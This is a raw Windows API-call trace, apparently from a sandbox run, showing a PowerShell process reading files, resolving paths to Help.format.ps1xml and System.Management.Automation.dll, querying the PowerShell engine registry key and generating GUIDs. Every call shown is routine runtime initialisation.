	[0769.128] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.129] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.129] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.129] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.130] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.130] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.130] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.131] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.131] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.131] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.132] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.132] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.132] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.137] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.138] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.138] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.138] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.139] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.139] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.139] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.139] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.140] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.141] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.141] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.141] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.142] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.142] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.142] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.143] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.143] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.143] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.144] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.144] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.144] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.145] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.145] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.145] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.146] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.146] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.146] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.147] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.147] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.147] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.148] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0xf37, lpOverlapped=0x0) returned 1
	[0769.148] ReadFile (in: hFile=0x318, lpBuffer=0x32eec6f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32eec6f*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0769.148] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0769.148] CloseHandle (hObject=0x318) returned 1
	[0769.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.148] SetErrorMode (uMode=0x1) returned 0x1
	[0769.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0769.149] SetErrorMode (uMode=0x1) returned 0x1
	[0769.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.149] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0769.149] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0769.149] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0769.149] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0769.149] CoTaskMemFree (pv=0x288e990) 
	[0769.149] RegCloseKey (hKey=0x318) returned 0x0
	[0769.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.154] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x2a016799, Data2=0xac3a, Data3=0x4917, Data4=([0]=0x87, [1]=0xc3, [2]=0x89, [3]=0xc7, [4]=0x3c, [5]=0xf5, [6]=0x2e, [7]=0xe9))) returned 0x0
	[0769.154] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xc143ebe, Data2=0xc7c9, Data3=0x468b, Data4=([0]=0xbf, [1]=0x6, [2]=0x37, [3]=0x8b, [4]=0x25, [5]=0x34, [6]=0x29, [7]=0xfb))) returned 0x0
	[0769.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0769.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0769.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0769.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0770.588] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x9fb95da2, Data2=0x39b8, Data3=0x4e1c, Data4=([0]=0x83, [1]=0x7a, [2]=0xfe, [3]=0x93, [4]=0x35, [5]=0xa8, [6]=0xa3, [7]=0x0))) returned 0x0
	[0770.593] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xa07a2fdd, Data2=0xa230, Data3=0x403a, Data4=([0]=0xbc, [1]=0xea, [2]=0x9f, [3]=0xa4, [4]=0x60, [5]=0x5, [6]=0x85, [7]=0x9c))) returned 0x0
	[0770.608] VirtualQuery (in: lpAddress=0x1cbf30, lpBuffer=0x1ccdf0, dwLength=0x30 | out: lpBuffer=0x1ccdf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0770.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0770.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0770.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0770.610] VirtualQuery (in: lpAddress=0x1cbf30, lpBuffer=0x1ccdf0, dwLength=0x30 | out: lpBuffer=0x1ccdf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0770.612] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0770.613] VirtualQuery (in: lpAddress=0x1cbf20, lpBuffer=0x1ccde0, dwLength=0x30 | out: lpBuffer=0x1ccde0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0770.615] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xfe6de27e, Data2=0x4186, Data3=0x4682, Data4=([0]=0x87, [1]=0xaa, [2]=0xd6, [3]=0x25, [4]=0x99, [5]=0x8d, [6]=0xe5, [7]=0xa))) returned 0x0
	[0770.616] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb2026267, Data2=0x6916, Data3=0x4430, Data4=([0]=0xb8, [1]=0xdd, [2]=0x40, [3]=0x78, [4]=0xf3, [5]=0x2f, [6]=0xd2, [7]=0xcf))) returned 0x0
	[0770.618] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x4f4777e5, Data2=0x3227, Data3=0x46d6, Data4=([0]=0xac, [1]=0xea, [2]=0xed, [3]=0xa5, [4]=0x78, [5]=0xb2, [6]=0xa8, [7]=0x79))) returned 0x0
	[0770.622] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xaa94a167, Data2=0xfa4d, Data3=0x480a, Data4=([0]=0x98, [1]=0xa9, [2]=0x50, [3]=0x38, [4]=0xf1, [5]=0x37, [6]=0x32, [7]=0xfa))) returned 0x0
	[0770.622] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x35bbfbe1, Data2=0x6145, Data3=0x4a8a, Data4=([0]=0x92, [1]=0x97, [2]=0xab, [3]=0x42, [4]=0x1f, [5]=0x8a, [6]=0xc1, [7]=0x9))) returned 0x0
	[0770.622] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x71fc6dfb, Data2=0xf20e, Data3=0x4c92, Data4=([0]=0x88, [1]=0xeb, [2]=0xed, [3]=0xf9, [4]=0x8, [5]=0x9e, [6]=0x1a, [7]=0xf))) returned 0x0
	[0770.622] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x33d52626, Data2=0x73be, Data3=0x4d25, Data4=([0]=0xb7, [1]=0x1c, [2]=0xbb, [3]=0x42, [4]=0xfe, [5]=0x44, [6]=0xac, [7]=0xe5))) returned 0x0
	[0770.623] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6259025e, Data2=0x9995, Data3=0x4ce7, Data4=([0]=0xbc, [1]=0xd4, [2]=0x54, [3]=0x13, [4]=0x41, [5]=0xcd, [6]=0xd2, [7]=0xac))) returned 0x0
	[0770.623] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x513b409b, Data2=0xcdb6, Data3=0x4dff, Data4=([0]=0xbb, [1]=0x9e, [2]=0x1f, [3]=0x63, [4]=0xd5, [5]=0xb1, [6]=0xb1, [7]=0x9))) returned 0x0
	[0770.623] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xe5a82fc7, Data2=0xd115, Data3=0x4511, Data4=([0]=0x9c, [1]=0x66, [2]=0xb5, [3]=0x19, [4]=0x8c, [5]=0x3b, [6]=0xd9, [7]=0x8d))) returned 0x0
	[0770.623] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6cecfe3, Data2=0x12ae, Data3=0x4806, Data4=([0]=0xa2, [1]=0xfa, [2]=0xc4, [3]=0x4, [4]=0xb3, [5]=0xb1, [6]=0x6e, [7]=0xc8))) returned 0x0
	[0770.624] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb9f1f893, Data2=0xbabf, Data3=0x4409, Data4=([0]=0xb4, [1]=0xd0, [2]=0xc5, [3]=0x74, [4]=0x65, [5]=0xdf, [6]=0xa1, [7]=0x4e))) returned 0x0
	[0770.626] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x7d6a8ced, Data2=0x6130, Data3=0x4ab6, Data4=([0]=0x97, [1]=0x3, [2]=0x6d, [3]=0x29, [4]=0x1c, [5]=0x2b, [6]=0x3a, [7]=0x74))) returned 0x0
	[0770.626] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x4c2bcd8d, Data2=0x8fe6, Data3=0x46a3, Data4=([0]=0xa8, [1]=0x2c, [2]=0xe4, [3]=0x6e, [4]=0x48, [5]=0x61, [6]=0xeb, [7]=0x9b))) returned 0x0
	[0770.627] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6a7f0d5c, Data2=0xe678, Data3=0x4d67, Data4=([0]=0x8b, [1]=0x21, [2]=0x81, [3]=0xa4, [4]=0x9a, [5]=0xff, [6]=0xea, [7]=0x7e))) returned 0x0
	[0770.627] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x3edcce33, Data2=0x7f7e, Data3=0x419f, Data4=([0]=0x97, [1]=0x4c, [2]=0x26, [3]=0xc5, [4]=0xc5, [5]=0x16, [6]=0x53, [7]=0x45))) returned 0x0
	[0770.627] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcecfbd45, Data2=0xad5f, Data3=0x4bf2, Data4=([0]=0x82, [1]=0x34, [2]=0x6e, [3]=0xc5, [4]=0xef, [5]=0xa5, [6]=0x6d, [7]=0x69))) returned 0x0
	[0771.096] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x70a5ba20, Data2=0x62e2, Data3=0x4317, Data4=([0]=0xbc, [1]=0xc2, [2]=0x74, [3]=0xae, [4]=0xf4, [5]=0xc4, [6]=0xd7, [7]=0xef))) returned 0x0
	[0771.096] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x36781a47, Data2=0x5d81, Data3=0x44bc, Data4=([0]=0x8b, [1]=0x30, [2]=0xe1, [3]=0xf9, [4]=0xf1, [5]=0x1b, [6]=0xae, [7]=0x92))) returned 0x0
	[0771.096] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xab973467, Data2=0xe89d, Data3=0x4a1c, Data4=([0]=0x9e, [1]=0x79, [2]=0x5d, [3]=0x20, [4]=0xb9, [5]=0x66, [6]=0x45, [7]=0x39))) returned 0x0
	[0771.096] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xd2bfcc5b, Data2=0xb29c, Data3=0x4deb, Data4=([0]=0xa5, [1]=0x7d, [2]=0x28, [3]=0xf7, [4]=0xbc, [5]=0x78, [6]=0x8b, [7]=0x4))) returned 0x0
